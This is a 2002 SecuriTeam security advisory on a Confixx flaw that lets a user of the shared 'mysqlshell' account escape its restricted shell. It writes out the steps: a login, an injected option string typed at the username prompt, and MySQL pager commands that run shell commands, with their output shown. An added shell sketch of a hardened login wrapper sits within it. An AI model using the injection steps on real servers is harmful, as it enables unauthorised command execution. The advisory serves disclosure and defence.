[UNIX] Confixx Vulnerability Allows Attacker Remote Control of the SQL Server

From: support@securiteam.com
Date: 07/26/02


From: support@securiteam.com
To: list@securiteam.com
Date: Fri, 26 Jul 2002 15:42:21 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Confixx Vulnerability Allows Attacker Remote Control of the SQL Server
------------------------------------------------------------------------

SUMMARY

Confixx (http://www.yippi-yeah.com/de/p_confixx.php) is a convenient tool
for automating customer administration on Linux-based web servers, with
graphical interfaces for administrators, resellers, and end users. A
security vulnerability in the product allows attackers to execute
arbitrary commands on the server, which in practice gives them remote
control of it.

DETAILS

A security vulnerability in Confixx allows attackers to execute commands
on many Confixx boxes almost without needing a valid account. All an
attacker needs is:
 - To know whether the web hosting provider is running Confixx
 - The password of the "mysqlshell-user"
 - Network access to the MySQL server

Since the password of the "mysqlshell-user" is the same for all customers,
obtaining it is trivial. The "mysqlshell-user" is confined to a restricted
shell; however, the technique below bypasses that restriction.

NOTE: Some providers neglect to set a hard-to-guess password, leaving it
set to 123456.

With this account and password, you can do the following:

---------------
debian:/root# ssh -l mysqlshell SERVERNAME
mysqlshell@SERVERNAME's password: <-- enter here the password from the
mysqlshell-user

Confixx-MySQL-Login
Bitte Usernamen eingeben:
---------------

Here you have to enter the following string:
 -e -h IP_OF_YOUR_MYSQL_SERVER TABLE --pager=\\nweb1

After that you will be prompted for a password, enter your PASSWORD (from
the user "-e" on your MySQL server).

---------------
web1
Enter password:
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 1951 to server version: 3.23.49-log

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> \P id;
PAGER set to id;
mysql> show tables;
uid=2030(mysqlshell) gid=105(costumer) groups=105(costumer)
..
mysql> \P ls /;
PAGER set to ls /;
mysql> show tables;
bin dev home initrd lost+found mnt proc sbin usr www
boot etc formmail index.html lib mail opt root tmp var
..

Vendor status:
A Confixx customer informed the vendor about 20 months ago. As a result,
Confixx added the line export EDITOR="/bin/false"; to the wrapper, so an
attacker can no longer use "edit;" at the MySQL prompt to obtain an
interactive shell through the editor.

However, you can still log in to the MySQL server and execute commands.

Workaround:
Delete the "mysqlshell-user".
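The advisory does not show the wrapper itself, so the following is an added, reconstructed sketch (not Confixx's own code) of the pattern at fault and a hardened replacement: the name typed at the "Bitte Usernamen eingeben:" prompt must never be word-split into mysql options. The names is_valid_user, mysql_login, confixx_login and the MYSQL variable (used to substitute the client binary when testing without a server) are assumptions.

```shell
#!/bin/sh
# Reconstructed pattern (hypothetical, not Confixx's code): the name is
# expanded unquoted, so "-e -h HOST TABLE --pager=..." becomes several
# separate mysql options instead of one username.  DO NOT USE:
#   read USERNAME
#   mysql -u $USERNAME -p

# Allowlist: lowercase letters, digits and underscore only, at least one
# character.  Anything starting with "-" or containing whitespace or shell
# metacharacters is refused before it gets near a command line.
is_valid_user() {
    case "$1" in
        ''|*[!a-z0-9_]*) return 1 ;;
        *) return 0 ;;
    esac
}

# Hardened login: the validated name is glued to --user= so it is always
# one argv element, and the default pager is disabled.  MYSQL may be set
# to another command (e.g. echo) to inspect the resulting argv offline.
mysql_login() {
    is_valid_user "$1" || { echo "invalid user name" >&2; return 1; }
    "${MYSQL:-mysql}" --skip-pager --user="$1" --password
}

# Entry point of the wrapper: read the name, then hand over to the client.
# An interactive mysql session can still set a pager with \P, so this
# stops the option injection but not the underlying exposure; the
# advisory's workaround (removing the account) remains the real fix.
confixx_login() {
    printf 'Bitte Usernamen eingeben: '
    read -r name
    mysql_login "$name"
}
```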

ADDITIONAL INFORMATION

The information has been provided by Ralf Dreibrodt <rd@mesos.de>.
